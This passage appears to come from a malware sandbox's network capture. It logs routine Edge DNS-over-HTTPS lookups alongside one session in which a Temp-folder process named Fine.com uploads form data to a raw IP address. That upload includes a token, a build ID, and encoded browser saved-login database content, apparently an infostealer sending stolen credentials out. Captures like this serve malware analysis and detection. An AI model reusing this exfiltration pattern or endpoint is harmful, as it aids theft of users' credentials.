                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:13 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          20192.168.2.550059172.64.41.34437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:12 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                                                          CF-RAY: 900e7d5d9de542e6-EWR
                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ea 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          21192.168.2.550056162.159.61.34437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:12 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                                                          CF-RAY: 900e7d5daa200fa3-EWR
                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f4 00 04 8e fa 50 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcomP)


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          22192.168.2.550055162.159.61.34437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:12 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                                                          CF-RAY: 900e7d5db995efa7-EWR
                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 23 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom#))


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          23192.168.2.550061162.159.61.34437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:12 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                                                          CF-RAY: 900e7d605d5f4307-EWR
                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 26 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom&()


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          24192.168.2.550062162.159.61.34437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:12 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                                                          CF-RAY: 900e7d6069d54339-EWR
                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fa 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          25192.168.2.550066172.64.41.34437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:12 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                                                          CF-RAY: 900e7d6118038c11-EWR
                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 08 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcomHc)


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          26192.168.2.550063195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC184OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----US0HLXBAAI5FU3WT000R
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 68733
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 55 53 30 48 4c 58 42 41 41 49 35 46 55 33 57 54 30 30 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 55 53 30 48 4c 58 42 41 41 49 35 46 55 33 57 54 30 30 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 55 53 30 48 4c 58 42 41 41 49 35 46 55 33 57 54 30 30 30 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------US0HLXBAAI5FU3WT000RContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------US0HLXBAAI5FU3WT000RContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------US0HLXBAAI5FU3WT000RCont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
